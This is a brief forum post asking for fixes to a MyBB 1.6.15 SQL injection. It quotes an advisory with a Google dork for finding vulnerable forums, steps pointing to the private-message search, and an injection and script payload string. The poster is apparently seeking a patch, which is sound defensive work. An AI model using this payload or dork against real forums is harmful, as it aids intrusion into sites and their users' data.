2014-08-21, 06:43 PM
Hello, any known fixes for this vulnerability?
# Title: MyBB 1.6.15 - SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.6.15
# Contact: [email protected]
# Video: http://www.youtube.com/watch?v=_29v1YEZE2s
***************************************************
[~#~] SQL Injection in Private Messages ( User CP )
Go to -> Inbox for example:
localhost/private.php
Search at the following code Keywords:
<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload